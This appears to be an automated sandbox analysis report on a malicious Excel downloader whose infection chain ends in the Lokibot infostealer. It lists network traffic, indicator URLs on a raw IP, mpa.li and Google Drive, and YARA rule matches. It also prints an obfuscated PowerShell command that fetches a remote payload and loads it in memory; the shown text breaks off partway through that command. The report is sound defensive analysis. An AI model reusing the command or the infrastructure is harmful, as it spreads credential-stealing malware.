Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:24:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/
Source: powershell.exe, 00000006.00000002.452706193.0000000003806000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/educatio
Source: powershell.exe, 00000006.00000002.452706193.0000000003806000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF
Source: powershell.exe, 00000006.00000002.456851525.000000001A9FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF34e089r
Source: powershell.exe, 00000006.00000002.452706193.0000000003806000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIFp
Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418291417.000000000297E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417828782.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.00000000002FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta
Source: mshta.exe, 00000004.00000003.417828782.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.00000000037D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta...
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaA
Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaG
Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaS
Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta_
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaf
Source: mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htag
Source: mshta.exe, 00000004.00000003.418291417.0000000002975000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htahttp://192.3.176.
Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htak
Source: mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htal
Source: mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaw
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.176.141/Z
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000006.00000002.452706193.0000000002E91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000006.00000002.452706193.000000000223C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.452706193.0000000002031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.604737245.000000000237E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.502500723.0000000002451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: AddInProcess32.exe, AddInProcess32.exe, 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.502500723.0000000002652000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 0000000F.00000002.502500723.0000000002652000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Source: powershell.exe, 0000000F.00000002.502500723.000000000281A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 0000000F.00000002.502500723.000000000281A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mpa.li/
Source: mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mpa.li/6432H
Source: mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mpa.li/C:T
Source: mshta.exe, 00000004.00000002.418466180.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx, 09230000.0.dr	String found in binary or memory: https://mpa.li/ZDFWtO
Source: powershell.exe, 00000006.00000002.452706193.000000000223C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443

Source: unknown	HTTPS traffic detected: 5.159.62.244:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.159.62.243:443 -> 192.168.2.22:49165 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3036, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: AddInProcess32.exe PID: 1488, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Excel sheet contains many unusual embedded objects

Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	OLE: Microsoft Excel 2007+
Source: 09230000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicegirlwithnewthingswhichevennobodknowthatkissingme[1].hta

Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKD